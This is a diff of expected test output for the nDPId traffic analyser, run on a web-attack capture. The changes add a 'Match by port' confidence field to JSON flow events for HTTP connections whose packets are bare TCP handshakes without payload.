 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9226,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":2,"flow_last_seen":1499348081113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348081113,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi7IGSc2TBloYFqAScSC8dgAAAgQFtAQCCAoD5vi3AT0nQwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9227,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":3,"flow_last_seen":1499348081114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348081114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P1dAAD4GhoGsEAABwKgKMouyAFAGWhgWBknNlIAQAOVbfQAAAQEICgE9J0QD5vi3"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347957282,"flow_last_seen":1499347962887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347957282,"flow_last_seen":1499347962887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347957282,"flow_last_seen":1499347962887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347958588,"flow_last_seen":1499347963888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347958588,"flow_last_seen":1499347963888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347958588,"flow_last_seen":1499347963888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347961167,"flow_last_seen":1499347966888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347961167,"flow_last_seen":1499347966888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347961167,"flow_last_seen":1499347966888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347962480,"flow_last_seen":1499347967888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347962480,"flow_last_seen":1499347967888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347962480,"flow_last_seen":1499347967888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347963774,"flow_last_seen":1499347968888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347963774,"flow_last_seen":1499347968888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347963774,"flow_last_seen":1499347968888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082159,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348082422,"flow_last_seen":1499348082422,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348082422,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1499348082422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348082422,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EzVAAD4GspusEAABwKgKMovAAFDEhDu+AAAAAKACchCo6AAAAgQFtAQCCAoBPSiLAAAAAAEDAwc="}
@@ -3794,17 +3794,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9306,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1499348091413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348091413,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nrdAAD4GJxmsEAABwKgKMoweAFAj3q\/lAAAAAKACchDMQQAAAgQFtAQCCAoBPTFTAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":2,"flow_last_seen":1499348091413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348091413,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjB4dm6koI96v5qAScSD\/rwAAAgQFtAQCCAoD5wLGAT0xUwEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":3,"flow_last_seen":1499348091414,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348091414,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nrhAAD4GJyCsEAABwKgKMoweAFAj3q\/mHZupKYAQAOWetwAAAQEICgE9MVMD5wLG"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347965133,"flow_last_seen":1499347970889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347965133,"flow_last_seen":1499347970889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347965133,"flow_last_seen":1499347970889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347966420,"flow_last_seen":1499347971889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347966420,"flow_last_seen":1499347971889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347966420,"flow_last_seen":1499347971889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347967724,"flow_last_seen":1499347972889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347967724,"flow_last_seen":1499347972889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347967724,"flow_last_seen":1499347972889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347970267,"flow_last_seen":1499347975890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347970267,"flow_last_seen":1499347975890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347970267,"flow_last_seen":1499347975890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347971560,"flow_last_seen":1499347976891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347971560,"flow_last_seen":1499347976891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347971560,"flow_last_seen":1499347976891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347974113,"flow_last_seen":1499347979891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347974113,"flow_last_seen":1499347979891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347974113,"flow_last_seen":1499347979891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092430,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348092675,"flow_last_seen":1499348092675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348092675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1499348092675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348092675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WzpAAD4GapasEAABwKgKMowsAFACaGm0AAAAAKACchAyoAAAAgQFtAQCCAoBPTKOAAAAAAEDAwc="}
@@ -3822,149 +3822,149 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1499348099359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348099359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tSBAAD4GELCsEAABwKgKMoxuAFCNr4w1AAAAAKACchB+DgAAAgQFtAQCCAoBPTkVAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":2,"flow_last_seen":1499348099359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348099359,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjG7WE+F5ja+MNqAScSC47wAAAgQFtAQCCAoD5wqJAT05FQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9371,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":3,"flow_last_seen":1499348099360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348099360,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tSFAAD4GELesEAABwKgKMoxuAFCNr4w21hPheoAQAOVX9wAAAQEICgE9ORUD5wqJ"}
